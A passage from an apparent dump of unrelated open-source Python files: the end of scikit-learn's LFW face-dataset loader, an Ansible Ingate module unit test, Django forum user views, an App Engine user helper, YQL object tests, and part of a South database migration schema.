official website:
http://vis-www.cs.umass.edu/lfw/
Each picture is centered on a single face. Each pixel of each channel
(color in RGB) is encoded by a float in range 0.0 - 1.0.
The task is called Face Recognition (or Identification): given the
picture of a face, find the name of the person given a training set
(gallery).
Parameters
----------
data_home: optional, default: None
Specify another download and cache folder for the datasets. By default
all scikit learn data is stored in '~/scikit_learn_data' subfolders.
funneled: boolean, optional, default: True
Download and use the funneled variant of the dataset.
resize: float, optional, default 0.5
Ratio used to resize each face picture.
min_faces_per_person: int, optional, default None
The extracted dataset will only retain pictures of people that have at
least `min_faces_per_person` different pictures.
color: boolean, optional, default False
Keep the 3 RGB channels instead of averaging them to a single
gray level channel. If color is True the shape of the data has
one more dimension than the shape with color = False.
slice_: optional
Provide a custom 2D slice (height, width) to extract the
'interesting' part of the jpeg files and avoid statistical
correlation from the background
download_if_missing: optional, True by default
If False, raise an IOError if the data is not locally available
instead of trying to download the data from the source site.
"""
lfw_home, data_folder_path = check_fetch_lfw(
data_home=data_home, funneled=funneled,
download_if_missing=download_if_missing)
logger.info('Loading LFW people faces from %s', lfw_home)
# wrap the loader in a memoizing function that will return memmaped data
# arrays for optimal memory usage
m = Memory(cachedir=lfw_home, compress=6, verbose=0)
load_func = m.cache(_fetch_lfw_people)
# load and memoize the pairs as np arrays
faces, target, target_names = load_func(
data_folder_path, resize=resize,
min_faces_per_person=min_faces_per_person, color=color, slice_=slice_)
# pack the results as a Bunch instance
return Bunch(data=faces.reshape(len(faces), -1), images=faces,
target=target, target_names=target_names,
DESCR="LFW faces dataset")
#
# Task #2: Face Verification on pairs of face pictures
#
def _fetch_lfw_pairs(index_file_path, data_folder_path, slice_=None,
color=False, resize=None):
"""Perform the actual data loading for the LFW pairs dataset
This operation is meant to be cached by a joblib wrapper.
"""
# parse the index file to find the number of pairs to be able to allocate
# the right amount of memory before starting to decode the jpeg files
with open(index_file_path, 'rb') as index_file:
split_lines = [ln.strip().split('\t') for ln in index_file]
pair_specs = [sl for sl in split_lines if len(sl) > 2]
n_pairs = len(pair_specs)
# iterating over the metadata lines for each pair to find the filename to
# decode and load in memory
target = np.zeros(n_pairs, dtype=np.int)
file_paths = list()
for i, components in enumerate(pair_specs):
if len(components) == 3:
target[i] = 1
pair = (
(components[0], int(components[1]) - 1),
(components[0], int(components[2]) - 1),
)
elif len(components) == 4:
target[i] = 0
pair = (
(components[0], int(components[1]) - 1),
(components[2], int(components[3]) - 1),
)
else:
raise ValueError("invalid line %d: %r" % (i + 1, components))
for j, (name, idx) in enumerate(pair):
person_folder = join(data_folder_path, name)
filenames = list(sorted(listdir(person_folder)))
file_path = join(person_folder, filenames[idx])
file_paths.append(file_path)
pairs = _load_imgs(file_paths, slice_, color, resize)
shape = list(pairs.shape)
n_faces = shape.pop(0)
shape.insert(0, 2)
shape.insert(0, n_faces // 2)
pairs.shape = shape
return pairs, target, np.array(['Different persons', 'Same person'])
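The reshape at the end of _fetch_lfw_pairs turns a flat stack of 2*n_pairs faces into an (n_pairs, 2, ...) array without copying; the same shape arithmetic with plain numbers (sizes are illustrative):

```python
shape = [6, 62, 47]            # 6 decoded faces = 3 pairs of 62x47 images
n_faces = shape.pop(0)         # -> [62, 47]
shape.insert(0, 2)             # -> [2, 62, 47]
shape.insert(0, n_faces // 2)  # -> [3, 2, 62, 47]
assert shape == [3, 2, 62, 47]
```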
def load_lfw_people(download_if_missing=False, **kwargs):
"""Alias for fetch_lfw_people(download_if_missing=False)
Check fetch_lfw_people.__doc__ for the documentation and parameter list.
"""
return fetch_lfw_people(download_if_missing=download_if_missing, **kwargs)
def fetch_lfw_pairs(subset='train', data_home=None, funneled=True, resize=0.5,
color=False, slice_=(slice(70, 195), slice(78, 172)),
download_if_missing=True):
"""Loader for the Labeled Faces in the Wild (LFW) pairs dataset
This dataset is a collection of JPEG pictures of famous people
collected on the internet, all details are available on the
official website:
http://vis-www.cs.umass.edu/lfw/
Each picture is centered on a single face. Each pixel of each channel
(color in RGB) is encoded by a float in range 0.0 - 1.0.
The task is called Face Verification: given a pair of two pictures,
a binary classifier must predict whether the two images are from
the same person.
In the official `README.txt`_ this task is described as the
"Restricted" task. As I am not sure as to implement the
"Unrestricted" variant correctly, I left it as unsupported for now.
.. _`README.txt`: http://vis-www.cs.umass.edu/lfw/README.txt
Parameters
----------
subset: optional, default: 'train'
Select the dataset to load: 'train' for the development training
set, 'test' for the development test set, and '10_folds' for the
official evaluation set that is meant to be used with a 10-folds
cross validation.
data_home: optional, default: None
Specify another download and cache folder for the datasets. By
default all scikit learn data is stored in '~/scikit_learn_data'
subfolders.
funneled: boolean, optional, default: True
Download and use the funneled variant of the dataset.
resize: float, optional, default 0.5
Ratio used to resize each face picture.
color: boolean, optional, default False
Keep the 3 RGB channels instead of averaging them to a single
gray level channel. If color is True the shape of the data has
one more dimension than the shape with color = False.
slice_: optional
Provide a custom 2D slice (height, width) to extract the
'interesting' part of the jpeg files and avoid statistical
correlation from the background
download_if_missing: optional, True by default
If False, raise an IOError if the data is not locally available
instead of trying to download the data from the source site.
"""
lfw_home, data_folder_path = check_fetch_lfw(
data_home=data_home, funneled=funneled,
download_if_missing=download_if_missing)
logger.info('Loading %s LFW pairs from %s', subset, lfw_home)
# wrap the loader in a memoizing function that will return memmaped data
# arrays for optimal memory usage
m = Memory(cachedir=lfw_home, compress=6, verbose=0)
load_func = m.cache(_fetch_lfw_pairs)
# select the right metadata file according to the requested subset
label_filenames = {
'train': 'pairsDevTrain.txt',
'test': 'pairsDevTest.txt',
'10_folds': 'pairs.txt',
}
if subset not in label_filenames:
raise ValueError("subset='%s' is invalid: should be one of %r" % (
subset, list(sorted(label_filenames.keys()))))
index_file_path = join(lfw_home, label_filenames[subset])
# load and memoize the pairs as np arrays
pairs, target, target_names = load_func(
index_file_path, data_folder_path, resize=resize, color=color,
slice_=slice_)
# pack the results as a Bunch instance
return Bunch(data=pairs.reshape(len(pairs), -1), pairs=pairs,
target=target, target_names=target_names,
DESCR="'%s' segment of the LFW pairs dataset" % subset)
def load_lfw_pairs(download_if_missing=False, **kwargs):
"""Alias for fetch_lfw_pairs(download_if_missing=False)
Check fetch_lfw_pairs.__doc__ for the documentation and parameter list.
"""
return fetch_lfw_pairs(download_if_missing=download_if_missing, **kwargs)
| bsd-3-clause |
andmos/ansible | test/units/modules/network/ingate/test_ig_unit_information.py | 50 | 1986 | # -*- coding: utf-8 -*-
# Copyright: (c) 2018, Ingate Systems AB
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from units.compat.mock import patch
from ansible.modules.network.ingate import ig_unit_information
from units.modules.utils import set_module_args
from .ingate_module import TestIngateModule, load_fixture
class TestUnitInformationModule(TestIngateModule):
module = ig_unit_information
def setUp(self):
super(TestUnitInformationModule, self).setUp()
self.mock_make_request = patch('ansible.modules.network.ingate.'
'ig_unit_information.make_request')
self.make_request = self.mock_make_request.start()
self.mock_is_ingatesdk_installed = patch('ansible.modules.network.ingate.'
'ig_unit_information.is_ingatesdk_installed')
self.is_ingatesdk_installed = self.mock_is_ingatesdk_installed.start()
def tearDown(self):
super(TestUnitInformationModule, self).tearDown()
self.mock_make_request.stop()
self.mock_is_ingatesdk_installed.stop()
def load_fixtures(self, fixture=None, command=None, changed=False):
self.make_request.side_effect = [load_fixture(fixture)]
self.is_ingatesdk_installed.return_value = True
def test_ig_unit_information(self):
set_module_args(
dict(
client=dict(
version='v1',
address='127.0.0.1',
scheme='http',
username='alice',
password='foobar'
)
)
)
fixture = '%s.%s' % (os.path.basename(__file__).split('.')[0], 'json')
result = self.execute_module(fixture=fixture)
self.assertTrue('unit-information' in result)
| gpl-3.0 |
hellsgate1001/thatforum_django | forumuser/views.py | 1 | 4005 | from django.conf import settings
from django.contrib.auth import get_user_model, authenticate, login as auth_login
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth.views import login
from django.views.generic import (
ListView,
DetailView,
CreateView,
UpdateView,
FormView
)
from django.core.urlresolvers import reverse
from braces.views import LoginRequiredMixin, PermissionRequiredMixin
from thatforum.mixins import RequestForFormMixIn
from .forms import LoginForm, UserForm, ChangePasswordForm, SignupForm
class UserLogin(FormView):
form_class = AuthenticationForm
template_name = 'forumuser/forumuser_form.html'
def form_valid(self, form):
return login(self.request, template_name='users/login.html')
def get_context_data(self, **kwargs):
context = super(UserLogin, self).get_context_data(**kwargs)
context['hide_edit_password'] = True
return context
class UserViewMixin(object):
def __init__(self, *args, **kwargs):
self.model = get_user_model()
super(UserViewMixin, self).__init__(*args, **kwargs)
class UserSignupView(UserViewMixin, RequestForFormMixIn, CreateView):
form_class = SignupForm
def dispatch(self, request, *args, **kwargs):
if request.method == 'GET' and 'HTTP_REFERER' in request.META.keys():
request.session['success_url'] = request.META['HTTP_REFERER']
request.session.save()
return super(UserSignupView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(UserSignupView, self).get_context_data(**kwargs)
context['hide_edit_password'] = True
return context
def get_success_url(self):
if 'success_url' in self.request.session:
success_url = self.request.session['success_url']
del(self.request.session['success_url'])
else:
success_url = self.object.get_absolute_url()
return success_url
def form_valid(self, form):
form.instance.set_password(form.cleaned_data.get('password1'))
form.instance.username = form.instance.email
form.instance.save()
login_user = authenticate(
username=form.instance.username,
password=form.cleaned_data.get('password1')
)
if login_user is not None:
auth_login(self.request, login_user)
return super(UserSignupView, self).form_valid(form)
class UserList(LoginRequiredMixin, UserViewMixin, ListView):
paginate_by = settings.DEFAULT_PAGINATE_BY
class UserDetail(LoginRequiredMixin, UserViewMixin, DetailView):
"""
View for displaying user details
"""
class UserUpdate(LoginRequiredMixin, PermissionRequiredMixin,
UserViewMixin, UpdateView):
"""
Edit the details for an existing user
"""
form_class = UserForm
permission_required = 'forumuser.change_user'
class UserCreate(LoginRequiredMixin, PermissionRequiredMixin,
UserViewMixin, CreateView):
"""
Create a new user
"""
form_class = UserForm
permission_required = 'forumuser.add_user'
def get_success_url(self, *args, **kwargs):
return self.object.get_absolute_url()
class UserProfile(
LoginRequiredMixin,
UserViewMixin,
RequestForFormMixIn,
UpdateView
):
"""
Allow a user to update their own details and profile
"""
form_class = UserForm
def get_object(self, queryset=None):
return self.request.user
class UserUpdatePassword(
LoginRequiredMixin,
UserViewMixin,
RequestForFormMixIn,
UpdateView
):
form_class = ChangePasswordForm
template_name = 'forumuser/changepassword_form.html'
def get_success_url(self):
return reverse('user:my_account')
def form_valid(self, form):
form.instance.set_password(form.cleaned_data.get('password1'))
return super(UserUpdatePassword, self).form_valid(form)
| mit |
vinaymavi/my-stats-appengine-api | helper/user_helper.py | 1 | 1804 | from entities.entities import Device, User
from helper.device_helper import DeviceHelper
from my_stats_messages.my_stats_messages import *
import logging
class UserHelper():
def __init__(self):
logging.info("constructor called.")
def link_device(self, user, device):
user.devices.append(device)
user.put()
return self.get_user_by_fb_id(user.fb_id)
def create_user(self, fb_id, name, email):
users = self.get_user_by_fb_id(fb_id)
if len(users) > 0:
pass
else:
user = User(fb_id=fb_id, name=name, email=email)
user.put()
return self.get_user_by_fb_id(fb_id)
def get_user_by_fb_id(self, fb_id):
query = User.query(User.fb_id == fb_id)
return query.fetch()
def create_user_resp(self, fb_id):
users = self.get_user_by_fb_id(fb_id)
device_helper = DeviceHelper()
if len(users) > 0:
user = users[0]
user_resp = UserMessage(fb_id=user.fb_id, name=user.name, email=user.email)
if len(user.devices) > 0:
for device in user.devices:
user_resp.devices.append(device_helper.create_device_resp(device))
return user_resp
def is_device_already_registered(self, device, device_list):
is_registered = False
logging.info("****Before loop*****")
logging.info(device)
logging.info(device.device_id)
for d in device_list:
logging.info(sorted(device.device_id.split()))
logging.info(sorted(d.device_id.split()))
if sorted(device.device_id.split()) == sorted(d.device_id.split()):
logging.info("is_registered=True")
is_registered = True
return is_registered
| mit |
FurCode/RoboCop | lib/yql/tests/test_yql_object.py | 12 | 5423 | """Tests for the YQL object"""
import json
from unittest import TestCase
from nose.tools import raises
from yql import YQLObj, NotOneError
data_dict = json.loads("""{"query":{"count":"3","created":"2009-11-20T12:11:56Z","lang":"en-US","updated":"2009-11-20T12:11:56Z","uri":"http://query.yahooapis.com/v1/yql?q=select+*+from+flickr.photos.search+where+text%3D%22panda%22+limit+3","diagnostics":{"publiclyCallable":"true","url":{"execution-time":"742","content":"http://api.flickr.com/services/rest/?method=flickr.photos.search&text=panda&page=1&per_page=10"},"user-time":"745","service-time":"742","build-version":"3805"},"results":{"photo":[{"farm":"3","id":"4117944207","isfamily":"0","isfriend":"0","ispublic":"1","owner":"12346075@N00","secret":"ce1f6092de","server":"2510","title":"Pandas"},{"farm":"3","id":"4118710292","isfamily":"0","isfriend":"0","ispublic":"1","owner":"12346075@N00","secret":"649632a3e2","server":"2754","title":"Pandas"},{"farm":"3","id":"4118698318","isfamily":"0","isfriend":"0","ispublic":"1","owner":"28451051@N02","secret":"ec0b508684","server":"2586","title":"fuzzy flowers (Kalanchoe tomentosa)"}]}}}""")
data_dict2 = json.loads("""{"query":{"count":"1","created":"2009-11-20T12:11:56Z","lang":"en-US","updated":"2009-11-20T12:11:56Z","uri":"http://query.yahooapis.com/v1/yql?q=select+*+from+flickr.photos.search+where+text%3D%22panda%22+limit+3","diagnostics":{"publiclyCallable":"true","url":{"execution-time":"742","content":"http://api.flickr.com/services/rest/?method=flickr.photos.search&text=panda&page=1&per_page=10"},"user-time":"745","service-time":"742","build-version":"3805"},"results":{"photo":{"farm":"3","id":"4117944207","isfamily":"0","isfriend":"0","ispublic":"1","owner":"12346075@N00","secret":"ce1f6092de","server":"2510","title":"Pandas"}}}}""")
yqlobj = YQLObj(data_dict)
yqlobj2 = YQLObj({})
yqlobj3 = YQLObj(data_dict2)
class YQLObjTest(TestCase):
@raises(AttributeError)
def test_yql_object_one(self):
"""Test that invalid query raises AttributeError"""
yqlobj.query = 1
def test_yqlobj_uri(self):
"""Test that the query uri is as expected."""
self.assertEqual(yqlobj.uri, u"http://query.yahooapis.com/v1/yql?q=select+*+"\
"from+flickr.photos.search+where+text%3D%22panda%22+limit+3")
def test_yqlobj_query(self):
"""Test retrieval of the actual query"""
self.assertEqual(yqlobj.query, u'select * from flickr.photos.search '\
'where text="panda" limit 3')
def test_yqlobj_count(self):
"""Check we have 3 records"""
self.assertEqual(yqlobj.count, 3)
def test_yqlobj_lang(self):
"""Check the lang attr."""
self.assertEqual(yqlobj.lang, u"en-US")
def test_yqlobj_results(self):
"""Check the results."""
expected_results = {u'photo': [
{u'isfamily': u'0',
u'title': u'Pandas',
u'farm': u'3',
u'ispublic': u'1',
u'server': u'2510',
u'isfriend': u'0',
u'secret': u'ce1f6092de',
u'owner': u'12346075@N00',
u'id': u'4117944207'},
{u'isfamily': u'0',
u'title': u'Pandas',
u'farm': u'3',
u'ispublic': u'1',
u'server': u'2754',
u'isfriend': u'0',
u'secret': u'649632a3e2',
u'owner': u'12346075@N00',
u'id': u'4118710292'},
{u'isfamily': u'0',
u'title': u'fuzzy flowers (Kalanchoe tomentosa)',
u'farm': u'3',
u'ispublic': u'1',
u'server': u'2586',
u'isfriend': u'0',
u'secret': u'ec0b508684',
u'owner': u'28451051@N02',
u'id': u'4118698318'}
]}
self.assertEqual(yqlobj.results, expected_results)
def test_yqlobj_raw(self):
"""Check the raw attr."""
self.assertEqual(yqlobj.raw, data_dict.get('query'))
def test_yqlobj_diagnostics(self):
"""Check the diagnostics"""
self.assertEqual(yqlobj.diagnostics, data_dict.get('query').get('diagnostics'))
def test_query_is_none(self):
"""Check query is None with no data."""
self.assertTrue(yqlobj2.query is None)
def test_rows(self):
"""Test we can iterate over the rows."""
stuff = []
for row in yqlobj.rows:
stuff.append(row.get('server'))
self.assertEqual(stuff, [u'2510', u'2754', u'2586'])
@raises(NotOneError)
def test_one(self):
"""Test that accessing one result raises exception"""
yqlobj.one()
def test_one_with_one_result(self):
"""Test accessing data with one result."""
res = yqlobj3.one()
self.assertEqual(res.get("title"), "Pandas")
| gpl-3.0 |
dimara/synnefo | snf-astakos-app/astakos/quotaholder_app/migrations/0010_non_accepted.py | 10 | 28734 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
depends_on = (
("im", "0058_moderation_fix"),
)
def forwards(self, orm):
pass
def backwards(self, orm):
"Write your backwards methods here."
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'im.additionalmail': {
'Meta': {'object_name': 'AdditionalMail'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']"})
},
'im.approvalterms': {
'Meta': {'object_name': 'ApprovalTerms'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'im.astakosuser': {
'Meta': {'object_name': 'AstakosUser', '_ormbases': ['auth.User']},
'accepted_email': ('django.db.models.fields.EmailField', [], {'default': 'None', 'max_length': '75', 'null': 'True', 'blank': 'True'}),
'accepted_policy': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'activation_sent': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'affiliation': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'auth_token': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'auth_token_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'auth_token_expires': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_signed_terms': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deactivated_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deactivated_reason': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True'}),
'disturbed_quota': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'email_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'has_credits': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'has_signed_terms': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'invitations': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'is_rejected': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'level': ('django.db.models.fields.IntegerField', [], {'default': '4'}),
'moderated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'moderated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'moderated_data': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['im.Resource']", 'null': 'True', 'through': "orm['im.AstakosUserQuota']", 'symmetrical': 'False'}),
'rejected_reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {}),
'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'primary_key': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'verification_code': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True', 'null': 'True'}),
'verified_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'im.astakosuserauthprovider': {
'Meta': {'ordering': "('module', 'created')", 'unique_together': "(('identifier', 'module', 'user'),)", 'object_name': 'AstakosUserAuthProvider'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'affiliation': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'auth_backend': ('django.db.models.fields.CharField', [], {'default': "'astakos'", 'max_length': '255'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'identifier': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'info_data': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'module': ('django.db.models.fields.CharField', [], {'default': "'local'", 'max_length': '255'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'auth_providers'", 'to': "orm['im.AstakosUser']"})
},
'im.astakosuserquota': {
'Meta': {'unique_together': "(('resource', 'user'),)", 'object_name': 'AstakosUserQuota'},
'capacity': ('django.db.models.fields.BigIntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'resource': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.Resource']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']"})
},
'im.authproviderpolicyprofile': {
'Meta': {'ordering': "['priority']", 'object_name': 'AuthProviderPolicyProfile'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'authpolicy_profiles'", 'symmetrical': 'False', 'to': "orm['auth.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_exclusive': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'policy_add': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_automoderate': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_create': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_limit': ('django.db.models.fields.IntegerField', [], {'default': 'None', 'null': 'True'}),
'policy_login': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_remove': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_required': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_switch': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'authpolicy_profiles'", 'symmetrical': 'False', 'to': "orm['im.AstakosUser']"})
},
'im.chain': {
'Meta': {'object_name': 'Chain'},
'chain': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'im.component': {
'Meta': {'object_name': 'Component'},
'auth_token': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'auth_token_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'auth_token_expires': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'base_url': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'})
},
'im.emailchange': {
'Meta': {'object_name': 'EmailChange'},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_email_address': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'requested_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'emailchanges'", 'unique': 'True', 'to': "orm['im.AstakosUser']"})
},
'im.endpoint': {
'Meta': {'object_name': 'Endpoint'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'endpoints'", 'to': "orm['im.Service']"})
},
'im.endpointdata': {
'Meta': {'unique_together': "(('endpoint', 'key'),)", 'object_name': 'EndpointData'},
'endpoint': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'data'", 'to': "orm['im.Endpoint']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
'im.invitation': {
'Meta': {'object_name': 'Invitation'},
'code': ('django.db.models.fields.BigIntegerField', [], {'db_index': 'True'}),
'consumed': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inviter': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'invitations_sent'", 'null': 'True', 'to': "orm['im.AstakosUser']"}),
'is_consumed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'realname': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'im.pendingthirdpartyuser': {
'Meta': {'unique_together': "(('provider', 'third_party_identifier'),)", 'object_name': 'PendingThirdPartyUser'},
'affiliation': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'third_party_identifier': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'im.project': {
'Meta': {'object_name': 'Project'},
'application': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'project'", 'unique': 'True', 'to': "orm['im.ProjectApplication']"}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.BigIntegerField', [], {'primary_key': 'True', 'db_column': "'id'"}),
